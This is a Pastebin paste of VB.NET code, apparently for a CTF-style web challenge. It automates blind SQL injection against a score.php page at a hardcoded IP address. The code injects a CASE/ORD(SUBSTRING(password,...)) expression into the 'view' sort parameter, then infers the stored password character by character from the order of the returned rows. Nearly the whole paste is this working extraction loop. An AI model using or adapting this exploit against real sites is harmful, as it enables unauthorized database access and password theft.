Advertisement
aqua_h4ck3r5

zombie

Jun 10th, 2012
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 3.07 KB | None | 0 0
  1. ' kitanai code
  2. ' dirty code
  3.         Dim moji As String = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!""#$%&'()=~|`{+*}<>?_\/.,]:;[@\^-"
  4.         'moji = "0123456789."
  5.         Dim pos As Integer = 1
  6.         Dim checked As Boolean = False
  7.         Dim mp As Integer = 0
  8.         Dim maxval As Integer = 5000
  9.         Dim chval As Integer = maxval
  10.  
  11.         Dim browser As New WebBrowser
  12.         While 1
  13.             If pos >= 11 Then Exit While
  14.             Dim url As String = "http://61.42.25.27/c/a8241dc330c0353ccd8db73244c8bd30/score.php?score=" & chval
  15.             browser.SendByGet(url)
  16.             '            url = "http://61.42.25.27/c/a8241dc330c0353ccd8db73244c8bd30/score.php?view=%28CASE%0D%0AORD%28SUBSTRING%28password%2C" & pos & "%2C1%29%29%0D%0AWHEN%0D%0A" & Asc(moji.Substring(mp, 1)) & "%0D%0ATHEN%0D%0Atm%0D%0AELSE%0D%0Ascore%0D%0AEND%29"
  17.             Dim sql As String = TextBox3.Text
  18.             sql = Replace(sql, "{POS}", pos)
  19.             sql = Replace(sql, "{CHARVAL}", Asc(moji.Substring(mp, 1)))
  20.             url = "http://61.42.25.27/c/a8241dc330c0353ccd8db73244c8bd30/score.php?view=" & System.Web.HttpUtility.UrlEncode(sql)
  21.             browser.SendByGet(url)
  22.  
  23.             Dim r As New Regex("\*\*\*\*</td><td>(.*?)</td></tr>", RegexOptions.Singleline Or RegexOptions.IgnoreCase)
  24.             Dim mc As MatchCollection = r.Matches(browser.GetLastData())
  25.  
  26.             Application.DoEvents()
  27.             Console.WriteLine("Checking [" & moji.Substring(mp, 1) & "]")
  28.  
  29.             If mc.Count <> 30 Then
  30.                 Application.DoEvents()
  31.                 Threading.Thread.Sleep(3000)
  32.                 chval = chval - 1
  33.                 If chval <= 0 Then chval = maxval
  34.                 Continue While
  35.  
  36.             End If
  37.  
  38.             Dim fmv As String = ""
  39.             For Each m As Match In mc
  40.                 fmv = fmv & m.Groups(1).Value & " / "
  41.                 If m.Groups(1).Value = chval Then
  42.                     If checked = True Then
  43.                         Console.WriteLine("[" & (pos + 1).ToString & "] " & moji.Substring(mp, 1))
  44.                         TextBox1.Text = TextBox1.Text & moji.Substring(mp, 1)
  45.                         Application.DoEvents()
  46.                         mp = 0
  47.                         pos = pos + 1
  48.                         checked = False
  49.                         chval = chval - 1
  50.                         If chval <= 0 Then chval = maxval
  51.                         Continue While
  52.  
  53.                     Else
  54.                         Console.WriteLine("maybe.... [" & moji.Substring(mp, 1) & "]?")
  55.                         checked = True
  56.                         chval = chval - 1
  57.                         If chval <= 0 Then chval = maxval
  58.                         Continue While
  59.  
  60.                     End If
  61.  
  62.                 End If
  63.                 Application.DoEvents()
  64.  
  65.             Next
  66.             chval = chval - 1
  67.             If chval <= 0 Then chval = maxval
  68.             'Console.WriteLine(fmv)
  69.  
  70.             Application.DoEvents()
  71.             checked = False
  72.             mp = mp + 1
  73.  
  74.         End While
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement